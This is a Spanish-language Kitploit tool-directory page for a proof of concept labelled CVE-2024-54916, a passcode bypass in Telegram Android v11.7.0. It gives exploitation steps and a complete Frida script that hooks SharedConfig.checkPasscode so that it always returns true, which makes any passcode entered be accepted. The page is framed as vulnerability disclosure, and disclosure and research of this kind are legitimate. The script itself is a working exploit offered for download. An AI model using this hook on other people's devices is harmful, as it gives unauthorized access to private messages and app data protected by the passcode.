Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-54916 — Prueba de concepto basada en Frida que demuestra un bypass de autenticación en Telegram Android APK v11.7.0 mediante el hooking del método SharedConfig.checkPasscode para que siempre devuelva true. | Kitploit
Herramientas/GitHubGitHub/sahalll/cve-2024-54916
Seguridad AndroidAnálisis Dinámico (Sandboxing)Análisis de VulnerabilidadesExplotaciónSeguridad MóvilAnálisis de BinariosAutenticación
GitHubsahalll/cve-2024-54916

CVE-2024-54916

Prueba de concepto basada en Frida que demuestra un bypass de autenticación en Telegram Android APK v11.7.0 mediante el hooking del método SharedConfig.checkPasscode para que siempre devuelva true.

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2024-54916: Omisión de Autenticación en Telegram APK

Un problema en la clase SharedConfig de Telegram Android APK v.11.7.0 permite a un atacante físicamente cercano omitir la autenticación y escalar privilegios manipulando el valor de retorno del método checkPasscode.

Tipo de Vulnerabilidad

Omisión de Autenticación

Proveedor del Producto

Telegram

Base de Código del Producto Afectado

Telegram APK Android v.11.7.0

Componente Afectado

org.telegram.messenger.SharedConfig

Explotación

Identificar la Clase y el Método Objetivo:

  • La clase SharedConfig en la aplicación gestiona la lógica de verificación del código de acceso.
  • El método checkPasscode dentro de esta clase es responsable de determinar la validez del código de acceso ingresado.

Enlazar el método usando Frida

  • Se utiliza un script de Frida para enganchar el método checkPasscode en la clase SharedConfig. La implementación del método se altera para que siempre devuelva true, omitiendo la validación real del código de acceso.

Ejecución

  • El script de Frida se ejecuta mientras la aplicación está en ejecución (Dinámicamente). Cualquier código de acceso ingresado por el usuario será aceptado como válido, permitiendo acceso no autorizado.

POC

Java.perform(function() {

// Locate the SharedConfig class in the target application

var PassCodeActivity = Java.use('org.telegram.messenger.SharedConfig');

// Hook the checkPasscode method to modify its behavior

PassCodeActivity.checkPasscode.implementation = function(passcode) {

// Bypass the actual passcode check by always returning true

return true;

};

});

Enlace del Video PoC:-

https://drive.google.com/file/d/1-lW1IQiCyj-8UXZOTedYPGPhQwfMLX4M/view?usp=sharing

Impacto:-

Esta vulnerabilidad es un problema de omisión de autenticación del lado del cliente. Afecta a los usuarios que dependen de la función de código de acceso para proteger datos sensibles o restringir el acceso a funcionalidades específicas de la aplicación. Al explotar esta falla, un atacante físicamente cercano puede manipular el proceso de verificación del código de acceso, omitir la autenticación y obtener acceso no autorizado a áreas protegidas de la aplicación. Esto podría llevar a la exposición de datos sensibles del usuario o a acciones no autorizadas dentro de la aplicación.

Descargar herramienta